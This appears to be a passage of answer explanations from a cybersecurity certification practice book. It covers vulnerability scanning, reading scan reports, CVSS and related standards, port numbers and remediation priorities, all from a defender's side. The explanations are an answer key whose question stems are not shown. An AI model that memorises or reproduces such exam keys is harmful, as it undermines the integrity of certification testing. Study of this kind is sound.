A. Using an agent-based scanning approach will provide Kim with the most reliable 
results for systems that are not always connected to the network. The agent can run the 
scans and then report results the next time the agent is connected to a network. The other 
technologies all require that the system be connected to the network during the scan. 


B. As Carla reads this report, she should note that the bottom three vulnerabilities have 

a status of Fixed. This indicates that the information leakage vulnerability is already cor- 
rected and that the server no longer supports TLSv1.0. The alert about the load balancer 
is severity 1, and Carla should treat it as informational. This leaves a severity 2 vulnerabil- 
ity for the expired SSL certificate as the highest-severity issue of the choices presented. 


C. Ina VM escape attack, the attacker exploits vulnerabilities in the hypervisor to gain 
access to resources assigned to other guest operating systems. Services running on the 
guest may be vulnerable to the other attacks listed here, but those attacks would only be 
able to access other resources assigned to either the same guest (in the case of buffer over- 
flow or directory traversal) or the client (in the case of cross-site scripting). 


B. Common Platform Enumeration (CPE) provides a standard nomenclature for describ- 
ing product names and versions, including applications and operating systems. Common 
Vulnerabilities and Exposures (CVE) provides a standard nomenclature for describing 
security-related software flaws. Common Vulnerability Scoring System (CVSS) provides 
a standardized approach for measuring and describing the severity of security-related 
software flaws. Open Vulnerability and Assessment Language (OVAL) is a language for 
specifying low-level testing procedures used by checklists. 
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C. Josh should ensure that the ICS is on an isolated network, unreachable from any 
Internet-connected system. This greatly reduces the risk of exploitation. It would not be 
cost-effective to develop a patch himself, and Josh should not trust any software that he 
obtains from an Internet forum. An intrusion prevention system, while a good idea, is not 
as strong a control as network isolation. 


C. This vulnerability has a severity rating of 3/5 and is further mitigated by the fact that 
the server is on an internal network, accessible only to trusted staff. This rises above the 
level of an informational report and should be addressed, but it does not require urgent 
attention. 


B. The Common Vulnerabilities and Exposures (CVE) provides a standard language for 
describing security flaws. Common Platform Enumeration (CPE) provides a standard 
language for product names and versions. Common Configuration Enumeration (CCE) 
provides a standard language for system configurations. The Extensible Configuration 
Checklist Description Format (XCCDF) provides a language for specifying checklists and 
reporting results. 


B. The High Severity Report is the most likely report of the choices given that will pro- 
vide a summary of critical security issues. The Technical Report will likely contain too 
much detail for Rob’s manager. The Patch Report will indicate systems and applications 
that are missing patches but omit other security issues. The Unknown Device Report will 
focus on systems detected during the scan that are not registered with the organization’s 
asset management system. 


A. The Payment Card Industry Data Security Standard (PCI DSS) regulates credit and 
debit card information. The Family Educational Rights and Privacy Act (FERPA) applies 
to student educational records. The Health Insurance Portability and Accountability Act 
(HIPAA) regulates protected health information. The Sarbanes-Oxley (SOX) Act requires 
controls around the handling of financial records for public companies. 


C. Web servers commonly run on ports 80 (for HTTP) and 443 (for HTTPS). Database 
servers commonly run on ports 1433 (for Microsoft SQL Server), 1521 (for Oracle), or 
3306 (for MySQL). Remote Desktop Protocol services commonly run on port 3389. There 
is no evidence that SSH, which uses port 22, is running on this server. 


B. Beth should perform testing of her code before deploying it to production. Because this 
code was designed to correct an issue in a vulnerability scan, Beth should ask the security 
team to rerun the scan to confirm that the vulnerability scan was resolved as one compo- 
nent of her testing. A penetration test is overkill and not necessary in this situation. Beth 
should not deploy the code to production until it is tested. She should not mark the issue 
as resolved until it is verified to work in production. 


B. Port 23 is used by telnet, an insecure unencrypted communications protocol. George 
should ensure that telnet is disabled and blocked. Secure shell (ssh) runs on port 22 and 
serves as a secure alternative. Port 161 is used by the Simple Network Management 
Protocol (SNMP), and port 443 is used for secure web connections. 


B. This system is exposing a service on port 3389. This port is typically used for remote 
administrative access to Windows servers. 
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C. The issue identified in this scan report is with a service running on port 3389. Win- 
dows systems use port 3389 for the Remote Desktop Protocol (RDP). Therefore, Harold 
should turn to this service first. 


D. None of the protocols and versions listed in this question is an acceptable way to cor- 
rect this vulnerability. All versions of SSL contain critical vulnerabilities and should no 
longer be used. TLSv1.0 also contains a vulnerability that would allow an attacker to 
downgrade the cryptography used by the server. Harold should upgrade the server to 
support at least TLSv1.2. 


D. VMware is a virtualization platform that is widely used to run multiple guest operat- 
ing systems on the same hardware platform. This vulnerability indicates a vulnerability 
in VMware itself, which is the hypervisor that moderates access to physical resources by 
those guest operating systems. 


C. A jumpbox allows Ken to isolate the vendor systems where they cannot directly access 
any other networked systems. The other solutions listed may be good security practices, 
but they do not mitigate the risk that an insecure vendor system may impact the security 
of other systems on the network. 


B. Quentin should reconfigure cipher support to resolve the issues surrounding the 

weak cipher support of SSL/TLS and RDP. He should also obtain a new SSL certificate 
to resolve multiple issues with the current certificate. He should add account security 
requirements to resolve the naming of guest accounts and the expiration of administrator 
passwords. There is no indication that any Windows patches are missing on this system. 


A. While all of these categories of information should trigger vulnerability scanning for 
assets involved in their storage, processing, or transmission, only credit card information 
has specific regulations covering these scans. The Payment Card Industry Data Security 
Standard (PCI DSS) contains detailed requirements for vulnerability scanning. 


A. Stella should remediate this vulnerability as quickly as possible because it is rated by 
the vendor as a Critical vulnerability. The description of the vulnerability indicates that 
an attacker could execute arbitrary code on the server and use this vulnerability to achieve 
escalation of privilege. Therefore, this should be one of Stella’s highest priorities for 
remediation. 


B. This system is running SharePoint. This application only runs on Microsoft Windows 
servers. 


B. The vulnerability report indicates that SharePoint application patches are available to 
correct the vulnerability on a variety of versions of SharePoint. This should be Stella’s first 
course of action as it will correct the underlying issue. Deploying an intrusion prevention 
system may also prevent attackers from exploiting the vulnerability but it will depend 
upon the positioning of the IPS and the attacker’s location on the network and will not 
correct the underlying issue. There is no indication that an operating system patch 

will correct the issue. Disabling the service will prevent an attacker from exploiting the 
vulnerability but will also disable the business critical service. 


D. A Supervisory Control and Data Acquisition (SCADA) network is a form of industrial 
control system (ICS) that is used to maintain sensors and control systems over a large 
geographic area. 
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D. The most likely issue is that Eric’s scanner has not pulled the most recent signatures 
from the vendor’s vulnerability feed. Eric should perform a manual update and rerun the 
scan before performing an investigation of the servers in question or filing a bug report. 


A. Blind SQL injection vulnerabilities are very difficult to detect and are a notorious 
source of false positive reports. Natalie should verify the results of the tests performed by 
the developers but should be very open to the possibility that this is a false positive report, 
as that is the most likely scenario. 


A. Virtualized systems run full versions of operating systems. If Frank’s scan revealed a 
missing operating system patch when he scanned a virtualized server, the patch should be 
applied directly to that guest operating system. 


D. Andrew can improve the quality and quantity of information available to the scan- 
ner by moving to credentialed scanning, moving to agent-based scanning, and integrating 
asset information into the scans. Any of these actions is likely to reduce the false positive 
rate. Increasing the sensitivity of scans would likely have the opposite effect, causing the 
scanner to report even more false positives. 


C. Of the choices presented, the maximum number of simultaneous checks per host is the 
only setting that would affect individual systems. Changing the number of simultaneous 
hosts per scan and the network timeout would have an effect on the broader network. 
Randomizing IP addresses would not have a performance impact. 


C. This report simply states that a cookie used by the service is not encrypted. Before rais- 
ing any alarms, Brenda should investigate the contents of the cookie to determine whether 
the compromise of its contents would introduce a security issue. This might be the case if 
the cookie contains session or authentication information. However, if the cookie does not 
contain any sensitive contents, Brenda may be able to simply leave the service as is. 


C. Information asset value refers to the value that the organization places upon data 
stored, processed, or transmitted by an asset. In this case, the types of information pro- 
cessed (e.g., regulated data, intellectual property, personally identifiable information) 
helps to determine information asset value. The cost of server acquisition, cost of hard- 
ware replacement, and depreciated cost all refer to the financial value of the hardware, 
which is a different concept than information asset value. 


D. Laura should consider deploying vulnerability scanning agents on the servers she 
wants to scan. These agents can retrieve configuration information and send it to the 
scanner for analysis. Credentialed scanning would also be able to retrieve this informa- 
tion, but it would require that Laura manage accounts on each scanned system. Server- 
based scanning would not be capable of retrieving configuration information from the 
host unless run in credentialed mode. Uncredentialed scans would not have the access 
required to retrieve detailed configuration information from scan targets. 


B. The vulnerability report states that the issue is with SQL Server. SQL Server is a data- 
base platform provided by Microsoft. 
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D. It is unlikely that a network IPS would resolve this issue because it would not be able 
to view the contents of an encrypted SSH session. Disabling port 22 would correct the 
issue although it may cause business disruption. Disabling AES-GCM is listed in the solu- 
tion section as a feasible workaround, while upgrading OpenSSH is the ideal solution. 


D. Unfortunately, Frank cannot take any action to remediate this vulnerability. He could 
consider restricting network access to the server, but this would likely have an undesirable 
effect on email access. The use of encryption would not correct this issue. The vulner- 
ability report indicates that “There is no known fix at this time,” meaning that upgrading 
Windows or Exchange would not correct the problem. 


B. SQL injection vulnerabilities target the data stored in enterprise databases, but they do 
so by exploiting flaws in client-facing applications. These flaws are most commonly, but 
not exclusively, found in web applications. 


B. This vulnerability exists in Microsoft Internet Information Server (IIS), which is a web 
server. The fact that the vulnerability could result in cross-site scripting issues also points 
to a web server. Web servers use the HTTP and HTTPS protocols. Ryan could configure 
IPS rules to filter HTTP/HTTPS access to this server. 


B. Applying a security patch would correct the issue on this server. The fact that the 
header for this vulnerability includes a Microsoft security bulletin ID (MS17-016) indi- 
cates that Microsoft likely released a patch in 2017. Disabling the IIS service would 
disrupt business activity on the server. Modifying the web application would not likely 
address this issue as the report indicates that it is an issue with the underlying IIS server 
and not a specific web application. IPS rules may prevent an attacker from exploiting the 
vulnerability but they would not correct the underlying issue. 


A. As this is an escalation of privilege vulnerability, it is likely that an attacker could gain 
complete control of the system. There is no indication that control of this system would 
then lead to complete control of the domain. Administrative control of the server would 
grant access to configuration information and web application logs, but these issues are 
not as serious as an attacker gaining complete control of the server. 


B. This server is located on an internal network and only has a private IP address. There- 
fore, the only scan that would provide any valid results is an internal scan. The external 
scanner would not be able to reach the file server through a valid IP address. 


A. Task 1 strikes the best balance between criticality and difficulty. It allows her to 
remediate a medium criticality issue with an investment of only six hours of time. Task 2 
is higher criticality, but would take three weeks to resolve. Task 3 is the same criticality 
but would require two days to fix. Task 4 is lower criticality but would require the same 
amount of time to resolve as Task 1. 


C. While all of these options are viable, the simplest solution is to design a report that 
provides the information and then configure the system to automatically send this report 
to the director each month. 
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C. If the firewall is properly configured, the workstation and file server are not accessible 
by an external attacker. Of the two remaining choices, the web server vulnerability (at 
severity 5) is more severe than the mail server vulnerability (at severity 1). Most organiza- 
tions do not bother to remediate severity 1 vulnerabilities because they are usually infor- 
mational in nature. 


A. This is an informational-level report that will be discovered on any server that sup- 
ports the OPTIONS method. This is not a serious issue and is listed as an informational 
item, so Mike does not need to take any action to address it. 


D. Ports 139 and 445 are associated with Windows systems that support file and printer 
sharing. 


A. While a buffer overflow attack could theoretically have an impact on information 
stored in the database, a SQL injection vulnerability poses a more direct threat by allow- 
ing an attacker to execute arbitrary SQL commands on the database server. Cross-site 
scripting attacks are primarily user-based threats that would not normally allow database 
access. A denial-of-service attack targets system availability, rather than information 
disclosure. 


A. IPsec is a secure protocol for the establishment of VPN links. Organizations should no 
longer use the obsolete Secure Sockets Layer (SSL) or Point-to-Point Tunneling Protocol 
(PPTP) for VPN connections or other secure connections. 


D. Rahul does not need to take any action on this vulnerability because it has a severity 
rating of 2 on a five-point scale. PCI DSS only requires the remediation of vulnerabilities 
with at least a “high” rating, and this vulnerability does not clear that threshold. 


C. This vulnerability is with the Network Time Protocol (NTP), a service that runs on 
UDP port 123. NTP is responsible for providing synchronizing for the clocks of servers, 
workstations, and other devices in the organization. 


D. Aaron should treat this vulnerability as a fairly low priority and may never get around 
to remediating it if there are more critical issues on his network. The vulnerability only 
has a severity rating of 2 (out of 5), and the vulnerability is further mitigated by the fact 
that the server is accessible only from the local network. 


A. The SQL injection attack could be quite serious as it may allow an attacker to retrieve 
and/or modify information stored in the backend database. The second highest priority 
should be resolving the use of unencrypted authentication, as it may allow the theft of 
user credentials. The remaining two vulnerabilities are less serious because they pose only 
a reconnaissance risk. 


A. The report notes that all of the vulnerabilities for these three servers are in Fixed sta- 
tus. This indicates that the vulnerabilities existed but have already been remediated and 
no additional work is required. 
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B. The most likely issue is that the maintenance subscription for the scanner expired 
while it was inactive and the scanner is not able to retrieve current signatures from the 
vendor’s vulnerability feed. The operating system of the scanner should not affect the scan 
results. Morgan would not be able to access the scanner at all if she had invalid creden- 
tials or the scanner had an invalid IP address. 


D. The most likely scenario is that a network IPS is blocking SQL injection attempts sent 
to this server, and the internal scanner is positioned on the network in such a way that it is 
not filtered by the network IPS. If a host IPS were blocking the requests, the vulnerability 
would likely not appear on internal scans either. If a firewall were blocking the requests, 
then no external scanner entries would appear in the log file. 


D. The fact that this vulnerability affects kernel-mode drivers is very serious, as it indi- 
cates that an attacker could compromise the core of the operating system in an escalation 
of privilege attack. The other statements made about this vulnerability are all correct, but 
they are not as serious as the kernel-mode issue. 


B. System engineers are normally in the best position to remediate vulnerabilities because 
they are responsible for maintaining the server configuration. Network engineers, secu- 
rity analysts, and managers may provide input, but they often lack either the privileges or 
knowledge to successfully remediate a server. 


A. Because both of these hosts are located on the same virtualization platform, it is likely 
that the network traffic never leaves that environment and would not be controlled by an 
external network firewall or intrusion prevention system. Ed should first look at the inter- 
nal configuration of the virtual network to determine whether he can apply the restriction 
there. 


D. This is an example of the POODLE vulnerability that exploits weaknesses in the 
OpenSSL encryption library. While replacing SSL with TLS and disabling weak ciphers 
are good practices, they will not correct this issue. Carl should upgrade OpenSSL to a 
more current version that does not contain this vulnerability. 


B. According to corporate policy, Renee must run the scans on a daily basis, so the week- 

end is not a viable option. The scans should run when they have the least impact on opera- 
tions, which, in this scenario, would be in the evening. The purpose of vulnerability scans 

is to identify known vulnerabilities in systems and not to perform load testing of servers. 


A. The highest-severity vulnerability in this report is the use of an outdated version of 
SNMP. Ahmed can correct this issue by disabling the use of SNMPv1 and SNMPv2, 
which contain uncorrectable security issues and replacing them with SNMPv3. The other 
actions offered as choices in this question would remediate other vulnerabilities shown in 
the report, but they are all of lower severity than the SNMP issue. 


C. Glenda can easily resolve this issue by configuring workstations to automatically 
upgrade Chrome. It is reasonable to automatically deploy Chrome updates to worksta- 
tions because of the fairly low impact of a failure and the fact that users could switch to 
another browser in the event of a failure. Manually upgrading Chrome would also resolve 
the issue, but it would not prevent future issues. Replacing Chrome with Internet Explorer 
would resolve this issue but create others, as Internet Explorer is no longer supported by 
Microsoft. This is a serious issue, so Glenda should not ignore the report. 
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B. Glenda should remediate this vulnerability as quickly as possible because it occurs 
widely throughout her organization and has a significant severity (4 on a five-point scale). 
If an attacker exploits this vulnerability, he or she could take control of the affected sys- 
tem by executing arbitrary code on it. 


C. Oracle database servers use port 1521 for database connections. Port 443 is used for 
HTTPS connections to a web server. Port 1433 is used by Microsoft SQL Server for data- 
base connections. Port 8080 is a nonstandard port for web services. 


A. The most likely explanation for this result is that the organization is running web 
services on a series of nonstandard ports from 2025 to 2035. The banner returned by 
the service on these ports indicates the use of Microsoft Internet Information Services 
and does not appear to be a false positive. There is no indication that the server has been 
compromised, although it may soon be compromised if they don’t update their outdated 
version of IIS! 


D. This cipher uses the insecure Data Encryption Standard (DES) algorithm and should 
be replaced. The other ciphers listed all use the secure Advanced Encryption Standard 
(AES) in place of DES encryption. 


B. The PCI DSS standard requires that merchants and service providers present a clean 
scan result that shows no critical or high vulnerabilities in order to maintain compliance. 


C. The vulnerability shown here affects PNG processing on systems running Windows. 
PNG is an acronym for Portable Networks Graphics and is a common image file format. 


C. Patrick should be extremely careful with this patch. If the patch causes services to fail, 
it has the potential to disable all of his organization’s Windows servers. This is a serious 
risk and requires testing prior to patch deployment. Patrick’s best course of action is to 
deploy the patch in a test environment and then roll it out into production on a staged 
basis if that test is successful. Options that involve deploying the patch to production 
systems prior to testing may cause those services to fail. Disabling all external access to 
systems is likely an overreaction that would have critical business impact. 


C. Common Configuration Enumeration (CCE) provides a standard nomenclature for 
discussing system configuration issues. Common Platform Enumeration (CPE) pro- 

vides a standard nomenclature for describing product names and versions. Common 
Vulnerabilities and Exposures (CVE) provides a standard nomenclature for describing 
security-related software flaws. Common Vulnerability Scoring System (CVSS) provides a 
standardized approach for measuring and describing the severity of security-related soft- 
ware flaws. 


C. The standard scan of 1,900 common ports is a reasonably thorough scan that 

will conclude in a realistic period of time. If Aaron knows of specific ports used in his 
organization that are not included in the standard list, he could specify them using the 
Additional section of the port settings. A full scan of all 65,535 ports would require an 
extremely long period of time on a Class C network. Choosing the Light Scan setting 
would exclude a large number of commonly used ports, while the None setting would not 
scan any ports. 
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C. The Apache web server stores log files in a file named access_log. By default on 
CentOS, this file may be found at /var/log/httpd/access_log. 


A. From the information given in the scenario, you can conclude that all of the HTTP/ 
HTTPS vulnerabilities are not exploitable by an attacker because of the firewall restric- 
tions. However, OpenSSL is an encryption package used for other services, in addition to 
HTTPS. Therefore, it may still be exposed via SSH or other means. Ken should replace 

it with a current, supported version because running an end-of-life (EOL) version of this 
package exposes the organization to potentially unpatchable security vulnerabilities. 


B. Banner grabbing scans are notorious for resulting in false positive reports because the 
only validation they do is to check the version number of an operating system or application 
against a list of known vulnerabilities. This approach is unable to detect any remediation 
activities that may have taken place that do not alter the version number. 


B. Vulnerability 3 has a CVSS score of 10.0 because it received the highest possible rat- 
ings on all portions of the CVSS vector. For example, it has ratings of “complete” for the 
confidentiality, integrity, and availability impact metrics, while the other two vulnerabili- 
ties have ratings of “partial” or “none” for those same metrics. 


D. A cybersecurity analyst should consider all of these factors when prioritizing reme- 
diation of vulnerabilities. The severity of the vulnerability is directly related to the risk 
involved. The likelihood of the vulnerability being exploited may be increased or reduced 
based upon the affected system’s network exposure. The difficulty of remediation may 
impact the team’s ability to correct the issue with a reasonable commitment of resources. 


B. There is no indication in the scenario that the server is running a database; in fact, 

the scenario indicates that the server is dedicated to running the Apache web service. 
Therefore, it is unlikely that a database vulnerability scan would yield any results. Landon 
should run the other three scans, and if they indicate the presence of a database server, he 
could follow up with a specialized database vulnerability scan. 


C. The vulnerability report’s impact statement reads as follows: “If successfully exploited, 
this vulnerability could lead to intermittent connectivity problems, or the loss of all Net- 
BIOS functionality.” This is a description of an availability risk. 


B. The CVSS string indicates that there is no Confidentiality (C:N) or Availability (A:N) 
risk associated with this vulnerability. It does indicate that there is a partial Integrity risk 
(I:P). 


C. Data classification is a set of labels applied to information based upon their degree of 
sensitivity and/or criticality. It would be the most appropriate choice in this scenario. Data 
retention requirements dictate the length of time that an organization should maintain 
copies of records. Data remnance is an issue where information thought to be deleted 

may still exist on systems. Data privacy may contribute to data classification but does not 
encompass the entire field of data sensitivity and criticality in the same manner as data 
classification. For example, a system may process proprietary business information that 
would be very highly classified and require frequent vulnerability scanning. Unless that 
system also processed personally identifiable information, it would not trigger scans under 
a system based solely upon data privacy. 
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C. In this scenario, a host firewall may be an effective way to prevent infections from 
occurring in the first place, but it will not expedite the recovery of a system that is already 
infected. Intrusion prevention systems and security patches will generally not be effective 
against a zero-day attack and also would not serve as a recovery control. Backups would 
provide Tom with an effective way to recover information that was encrypted during a 
ransomware attack. 


B. There is no reason to believe that upgrading the operating system will resolve this 
application vulnerability. All of the other solutions presented are acceptable ways to 
address this risk. 


D. This is a serious vulnerability because it exposes significant network configuration 
information to attackers and could be used to wage other attacks on this network. How- 
ever, the direct impact of this vulnerability is limited to reconnaissance of network con- 
figuration information. 


B. In this case, Ted should ask the DBA to recheck the server to ensure that the patch was 
properly applied. It is not yet appropriate to mark the issue as a false positive report until 
Ted performs a brief investigation to confirm that the patch is applied properly. This is 
especially true because the vulnerability relates to a missing patch, which is not a com- 
mon source of false positive reports. There was no acceptance of this vulnerability, so 
Ted should not mark it as an exception. Ted should not escalate this issue to management 
because the DBA is working with him in good faith. 


A. This is most likely a false positive report. The vulnerability description says “note 
that this script is experimental and may be prone to false positives.” It is less likely that 
the developers and independent auditors are all incorrect. The scanner is most likely 
functioning properly, and there is no indication that either it or the database server is 
misconfigured. 


B. X.509 certificates are used to exchange public keys for encrypted communications. 
They are a fundamental part of the SSL and TLS protocols, and an issue in an X.509 cer- 
tificate may definitely affect HTTPS, SSH, and VPN communications that depend upon 
public key cryptography. HTTP does not use encryption and would not be subject to this 
vulnerability. 


A. This is an example of a false positive report. The administrator demonstrated that the 
database is not subject to the vulnerability because of the workaround, and Larry went a 
step further and verified this himself. Therefore, he should mark the report as a false posi- 
tive in the vulnerability scanner. 


B. False positive reports like the one described in this scenario are common when a vul- 
nerability scanner depends upon banner grabbing and version detection. The primary 
solution to this issue is applying a patch that the scanner would detect by noting a new 
version number. However, the administrator performed the perfectly acceptable action of 
remediating the vulnerability in a different manner without applying the patch, but the 
scanner is unable to detect that remediation activity and is reporting a false positive result. 


C. The Post Office Protocol v3 (POP3) is used for retrieving email from an email server. 
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A. Margot can expect to find relevant results in the web server logs because they would 
contain records of HTTP requests to the server. Database server logs would contain 
records of the queries made against the database. IDS logs may contain logs of SQL injec- 
tion alerts. Netflow logs would not contain useful information because they only record 
traffic flows, not the details of the communications. 


A. The runas command allows an administrator to execute a command using the privi- 
leges of another user. Linux offers the same functionality with the sudo command. The 
Linux su command is similar but allows an administrator to switch user identities, rather 
than simply execute a command using another user’s identity. The ps command in Linux 
lists active processes, while the grep command is used to search for text matching a 
pattern. 


A. Plain-text authentication sends credentials “in the clear,” meaning that they are trans- 
mitted in unencrypted form and are vulnerable to eavesdropping by an attacker with 
access to a network segment between the client and server. 


B. Common Vulnerabilities and Exposures (CVE) provides a standard nomenclature for 
describing security-related software flaws. Common Platform Enumeration (CPE) pro- 
vides a standard nomenclature for describing product names and versions, including appli- 
cations and operating systems. Common Vulnerability Scoring System (CVSS) provides 

a standardized approach for measuring and describing the severity of security-related 
software flaws. Open Vulnerability and Assessment Language (OVAL) is a language for 
specifying low-level testing procedures used by checklists. 


D. Fingerprinting vulnerabilities disclose information about a system and are used in 
reconnaissance attacks. This vulnerability would allow an attacker to discover the operat- 
ing system and version running on the target server. 


B. The majority of the most serious issues in this scan report relate to missing security 
updates to Windows and applications installed on the server. Amanda should schedule 

a short outage to apply these updates. Blocking inbound connections at the host firewall 
would prevent the exploitation of these vulnerabilities, but it would also prevent users 
from accessing the server. Disabling the guest account and configuring the use of secure 
ciphers would correct several vulnerabilities, but they are not as severe as the vulnerabili- 
ties related to patches. 


D. Ben should obtain permission from the client to perform scans before engaging in any 
other activities. Failure to do so may violate the law and/or anger the client. 


A. The fact that the server runs a critical business process should increase the importance 
of the patch, rather than deferring it indefinitely. Katherine should work with the engineer 
to schedule the patch to occur during a regular maintenance window. It is reasonable to 

wait until that scheduled window because of the relatively low impact of the vulnerability. 


C. The best options to correct this vulnerability are either removing the JRE if it is no 
longer necessary or upgrading it to a recent, secure version. This vulnerability is exploited 
by the user running a Java applet and does not require any inbound connections to the 
victim system, so a host firewall would not be an effective control. A web content filter- 
ing solution, while not the ideal solution, may be able to block malicious GIF files from 
exploiting this vulnerability. 
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B. In this situation, Grace is facing a true emergency. Her web server has a critical vul- 
nerability that is exposed to the outside world and may be easily exploited. Grace should 
correct the issue immediately, informing all relevant stakeholders of the actions that she is 
taking. She can then follow up by documenting the change as an emergency action in her 
organization’s change management process. All of the other approaches in this question 
introduce an unacceptable delay. 


A. While ARP tables may provide the necessary information, this is a difficult way to 
enumerate hosts and is prone to error. Doug would have much greater success if he con- 
sulted the organization’s asset management tool, ran a discovery scan, or looked at the 
results of other recent scans. 


A. The most likely reason for this result is that the scan sensitivity is set to exclude low- 
impact vulnerabilities rated as 1 or 2. There is no reason to believe that Mary configured 
the scan improperly because this is a common practice to limit information overload and 
is likely intentional. It is extremely unlikely that systems in the data center contain no 
low-impact vulnerabilities when they have high-impact vulnerabilities. If Mary excluded 
high-impact vulnerabilities, the report would not contain any vulnerabilities rated 4 or 5. 


D. This vulnerability is presented as an Info level vulnerability and, therefore, does not 
represent an actual threat to the system. James can safely ignore this issue. 


D. Vulnerability scans can only provide a snapshot in time of a system’s security status 
from the perspective of the vulnerability scanner. Agent-based monitoring provides a 
detailed view of the system’s configuration from an internal perspective and is likely to 
provide more accurate results, regardless of the frequency of vulnerability scanning. 


A. The SQL injection vulnerability is clearly the highest priority for remediation. It has 
the highest severity (5/5) and also exists on a server that has public exposure because it 
resides on the DMZ network. 


D. Pete and the desktop support team should apply the patch using a GPO or other cen- 
tralized configuration management tool. This is much more efficient than visiting each 
workstation individually, either in person or via remote connection. There is no indication 
in the scenario that a registry update would remediate this issue. 


A. An insider would have the network access required to connect to a system on the inter- 
nal server network and exploit this buffer overflow vulnerability. Buffer overflow vulner- 
abilities typically allow the execution of arbitrary code, which may allow an attacker to 
gain control of the server and access information above his or her authorization level. Vul- 
nerability 3 may also allow the theft of information, but it has a lower severity level than 
vulnerability 2. Vulnerabilities 4 and 5 are denial-of-service vulnerabilities that would 
allow the disruption of service, not the theft of information. 


A. Wanda should restrict interactive logins to the server. The vulnerability report states 
that “The most severe of these vulnerabilities could allow remote code execution if a user 
either visits a specially crafted website or opens a specially crafted document.” If Wanda 
restricts interactive login, it greatly reduces the likelihood of this type of activity. Remov- 
ing Internet Explorer or Microsoft Office might lower some of the risk, but it would 

not be as effective as completely restricting logins. Applying the security patch is not an 
option because of the operational concerns cited in the question. 
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D. For best results, Garret should combine both internal and external vulnerability scans. 
The external scan provides an “attacker’s eye view” of the web server, while the inter- 

nal scan may uncover vulnerabilities that would only be exploitable by an insider or an 
attacker who has gained access to another system on the network. 


A. The scenario describes an acceptable use of a compensating control that has been 
reviewed with the merchant bank. Frank should document this as an exception and move 
on with his scans. Other actions would go against his manager’s wishes and are not 
required by the situation. 


D. All three of these scan types provide James with important information and/or are 
needed to meet regulatory requirements. The external scan from James’ own network pro- 
vides information on services accessible outside of the payment card network. The internal 
scan may detect vulnerabilities accessible to an insider or someone who has breached the 
network perimeter. The approved scanning vendor (ASV) scans are required to meet PCI 
DSS obligations. Typically, ASV scans are run infrequently and do not provide the same 
level of detailed reporting as scans run by the organization’s own external scans, so James 
should include both in his program. 


A. Any one of the answer choices provided is a possible reason that Helen received this 
result. However, the most probable scenario is that the printer is actually running a web 
server and this is a true positive result. Printers commonly provide administrative web 
interfaces, and those interfaces may be the source of vulnerabilities. 


D. Joe has time to conduct some communication and change management before making 
the change. Even though this change is urgent, Joe should take advantage of that time to 
communicate with stakeholders, conduct a risk assessment, and initiate change manage- 
ment processes. These tasks will likely be abbreviated forms of what Joe would do if he 
had time to plan a change normally, but he should make every effort to complete them. 


C. Port 389 is used by the Lightweight Directory Access Protocol (LDAP) and is not part 


of the SMB communication. SMB may be accessed directly over TCP port 445 or indi- 
rectly by using NetBIOS over TCP/IP on TCP ports 137 and 139. 


B. Ted can reduce the number of results returned by the scan by decreasing the scan sen- 
sitivity. This will increase the threshold for reporting, only returning the most important 
results. Increasing the scan sensitivity would have the opposite effect, increasing the num- 
ber of reported vulnerabilities. Changing the scan frequency would not alter the number 
of vulnerabilities reported. 


A. Microsoft has discontinued support for Internet Explorer versions other than IE 
11 and is planning to discontinue Internet Explorer after version 11 because it is being 
replaced by Microsoft Edge. Google Chrome and Mozilla Firefox are also suitable 
replacement browsers. 


A. Buffer overflow vulnerabilities occur when an application attempts to put more data 
in a memory location than was allocated for that use, resulting in unauthorized writes to 
other areas of memory. Bounds checking verifies that user-supplied input does not exceed 
the maximum allowable length before storing it in memory. 
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C. This vulnerability allows an attacker to crash a server after running two consecu- 
tive port scans. The simplest way to trigger this vulnerability is by using a port scanning 
tool, such as nmap. While Nessus or Metasploit may be able to trigger this vulnerability, 
it would be easier to do so with a command-line port scanner. Wireshark is a protocol 
analyzer and could not trigger this vulnerability. 


A. The Simple Network Management Protocol (SNMP) uses traps and polling requests 

to monitor and manage both physical and virtual networks. The Simple Mail Transfer 
Protocol (SMTP) is an email transfer protocol. The Border Gateway Protocol (BGP) and 
Enhanced Interior Gateway Routing Protocol (EIGRP) are used to make routing decisions. 


D. System D is the only system that contains a critical vulnerability, as seen in the scan 
results. Therefore, Sherry should begin with this system as it has the highest-priority 
vulnerability. 


D. The problem Victor is experiencing is that the full scan does not complete in the 
course of a single day and is being cancelled when the next full scan tries to run. He can 
fix this problem by reducing the scanning frequency. For example, he could set the scan 
to run once a week so that it completes. Reducing the number of systems scanned would 
not meet his requirement to scan the entire data center. He cannot increase the number of 
scanners or upgrade the hardware because he has no funds to invest in the system. 


C. The only high-criticality issue on this report (and all but one of the medium-criticality 
issues) relates to an outdated version of the Apache web server. Vanessa should upgrade 
this server before taking any other remediation action. 


D. The Relaunch On Finish schedule option will run continuous vulnerability scanning 
of the target servers. Each time the scan completes, it will start over again. Gil should be 
extremely careful when choosing this option because it may cause undesirable resource 
consumption for both the scanner and the target servers. 


D. This scan result does not directly indicate a vulnerability. However, it does indicate 
that the server is configured for compatibility with 16-bit applications, and those applica- 
tions may have vulnerabilities. It is an informational result that does not directly require 
action on Terry’s behalf. 


B. PuTTY is a commonly used remote login application used by administrators to con- 
nect to servers and other networked devices. If an attacker gains access to the SSH private 
keys used by PuTTY, the attacker could use those keys to gain access to the systems man- 
aged by that administrator. This vulnerability does not necessarily give the attacker any 
privileged access to the administrator’s workstation, and the SSH key is not normally used 
to encrypt stored information. 


B. Craig should remove the four pieces of obsolete software identified by the vulnerability 
scan (Java 6.1, Internet Explorer 8, Microsoft .NET Framework 4, and Microsoft Visual 
C++ 2005). He should also apply the Windows MS17-012 security update and patch 
Chrome, Java, and other vulnerable applications on this system. All of these issues raise 
critical vulnerabilities in the scan report. There is no indication that host firewall changes 
are required. 
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D. While all of the technologies listed here contribute to the security of mobile devices, 
only containerization allows the isolation and protection of sensitive information separate 
from other uses of the device. Containerization technology creates a secure vault for cor- 
porate information that may be remotely wiped without affecting other uses of the device. 
It also protects the contents of the container from other applications and services running 
on the device. 


A. In this situation, Sally recognizes that there is no imminent threat, so it is not neces- 
sary to follow an emergency change process that would allow her to implement the change 
before conducting any change management. That said, the change should be made without 
waiting up to three months for a scheduled patch cycle. Therefore, Sally’s best option is to 
initiate a high-priority change through her organization’s change management process. 


C. Gene’s best option is to alter the sensitivity level of the scan so that it excludes low- 
importance vulnerabilities. The fact that his manager is telling him that many of the 
details are unimportant is his cue that the report contains superfluous information. While 
he could edit the chart manually, he should instead alter the scan settings so that he does 
not need to make those manual edits each time he runs the report. 


D. Veronica is required to rerun the vulnerability scan until she receives a clean result 
that may be submitted for PCI DSS compliance purposes. 


